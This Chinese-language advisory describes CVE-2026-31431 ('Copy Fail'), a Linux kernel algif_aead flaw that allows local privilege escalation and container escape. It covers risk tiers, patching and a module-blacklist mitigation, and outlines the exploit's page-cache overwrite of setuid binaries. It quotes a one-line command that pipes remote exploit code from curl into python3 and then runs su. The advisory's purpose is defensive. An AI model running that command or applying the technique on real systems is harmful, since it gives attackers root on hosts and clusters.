CVE-2026-31431,一个潜伏了近 10 年的 Linux 内核逻辑漏洞,于 2026 年 4 月 29 日被公开披露。这个被命名为 "Copy Fail" 的漏洞,凭借100% 成功率、跨所有主流发行版、无需任何内核偏移、仅 732 字节 Python 脚本即可实现本地提权和容器逃逸的特性。
一、漏洞概述:最危险的 Linux LPE 之一
Copy Fail(CVE-2026-31431)是 Linux 内核加密子系统algif_aead中的一个直线型逻辑漏洞,由安全研究团队 Xint Code 发现。 与绝大多数需要竞态条件、内核特定偏移或复杂利用链的 Linux 本地权限提升(LPE)漏洞不同,Copy Fail不需要任何特殊条件:
- 利用代码仅 732 字节,纯 Python 标准库编写(仅依赖os、socket、zlib)
- 跨容器、跨租户逃逸,可突破 Kubernetes 隔离
影响范围:2017 年至今发布的所有主流 Linux 发行版,包括但不限于:- Debian、Arch、Fedora、Rocky、Alma、Oracle Linux 几乎所有嵌入式 Linux 系统
二、为什么这个漏洞比你想象的更危险?
Copy Fail 之所以被称为 "史诗级漏洞",是因为它同时具备了四个几乎从未在 Linux LPE 中同时出现的致命特性: 表格 特性 典型 Linux LPE Copy Fail 竞态条件 必须依赖 完全不需要 发行版特定偏移 必须依赖 完全不需要 利用成功率 30%-80%/ 次 100% 单次成功 影响时间窗口 几个月到 1 年 2017-2026(9 年)
- 极致便携:一个脚本通杀所有系统 同一个 732 字节的 Python 脚本,无需任何修改,就能在 Ubuntu、Amazon Linux、RHEL、SUSE 等所有主流发行版上直接获取 root 权限。这在 Linux 漏洞历史上是极其罕见的。
- 极致隐蔽:不留任何磁盘痕迹 漏洞利用通过修改内核页缓存实现,不会向磁盘写入任何数据: 被篡改的二进制文件(如/usr/bin/su)在磁盘上保持原样 不会触发文件系统监控(inotify) 重启或清空页缓存后,所有痕迹自动消失 传统磁盘取证无法发现攻击痕迹
- 跨容器逃逸:K8s 集群的噩梦 由于 Linux 内核页缓存是主机级共享的,一个普通容器内的非特权用户,可以通过这个漏洞直接篡改主机上的 setuid 二进制文件,从而突破容器隔离,获取整个节点的 root 权限,并进一步横向移动到同一集群的其他节点。
- 极易武器化:攻击门槛为零 漏洞利用代码已完全公开,任何有基本 Linux 知识的攻击者都能在几秒钟内完成攻击。官方给出的演示命令甚至只有一行:
curl https://copy.fail/exp | python3 && su
三、风险分级:这些系统必须立即修复
根据官方评估,不同场景的风险等级如下:
- 极高风险(必须 24 小时内修复) 多租户 Linux 主机:共享开发机、跳板机、构建服务器 Kubernetes / 容器集群:任何运行共享内核容器的环境 CI/CD 运行器:GitHub Actions 自托管 runner、GitLab runner、Jenkins agent 云 SaaS 用户代码执行环境:Jupyter Notebook、无服务器函数、租户容器 后果:任何普通用户 / 恶意 PR / 租户代码都能直接获取主机 root 权限,实现跨租户横向移动。
- 高风险(72 小时内修复) 单租户生产服务器 内部应用服务器 数据库服务器 后果:一旦攻击者通过其他漏洞(如 Web RCE)获取普通用户权限,可立即提权至 root。
- 中风险(一周内修复) 单用户笔记本电脑和工作站 后果:漏洞本身无法远程利用,但任何本地代码执行都能直接升级为 root 权限。
四、紧急修复与缓解措施
- 首选方案:安装内核补丁 所有主流 Linux 发行版已开始推送修复补丁。请立即更新你的内核到包含以下主线提交的版本:
a664bf3d603d ("crypto: algif_aead: Revert in-place encryption optimization")
- 临时缓解:禁用algif_aead模块 在无法立即打补丁的情况下,执行以下命令禁用漏洞所在的内核模块:
echo"install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.confrmmod algif_aead 2>/dev/null || true
重要说明:禁用algif_aead模块几乎不会影响绝大多数系统的正常运行:
- 不影响:dm-crypt/LUKS、kTLS、IPsec、SSH、OpenSSL 默认配置
- 仅影响:显式启用了 AF_ALG 引擎的 OpenSSL、部分嵌入式加密卸载路径
- 额外防护:阻止 AF_ALG 套接字创建 对于运行不可信工作负载的环境(容器、沙箱、CI),无论是否打补丁,都应通过 seccomp 阻止AF_ALG套接字的创建。
五、技术原理
Copy Fail 的本质是:一个非特权本地用户可以向系统中任何可读文件的内核页缓存写入 4 个可控字节。攻击者利用这一点,篡改/usr/bin/su、/usr/bin/passwd等 setuid-root 二进制文件在内存中的副本。当系统执行这些被篡改的二进制文件时,就会以 root 权限执行攻击者的代码。与著名的 Dirty Pipe 和 Dirty Cow 漏洞相比:
- 比 Dirty Pipe 影响范围更广(覆盖 2017 年至今所有内核,而 Dirty Pipe 仅影响 5.8+)
- 比 Dirty Cow 更可靠(无竞态条件,100% 成功,不会导致系统崩溃) 六、总结与建议 Copy Fail 是近年来影响最广泛、利用最简单、后果最严重的 Linux 内核漏洞之一。对于任何运行 Linux 系统的组织和个人,强烈建议:
- 优先修复多租户环境、容器集群和 CI/CD 运行器
- 加强监控:关注异常的 setuid 二进制文件执行和权限提升行为
- 对于容器环境:考虑使用强隔离技术(如 Kata Containers)替代共享内核容器
- 安全无小事,尤其是这种潜伏了近 10 年的 "核弹级" 漏洞。请务必尽快完成修复,避免成为攻击者的目标。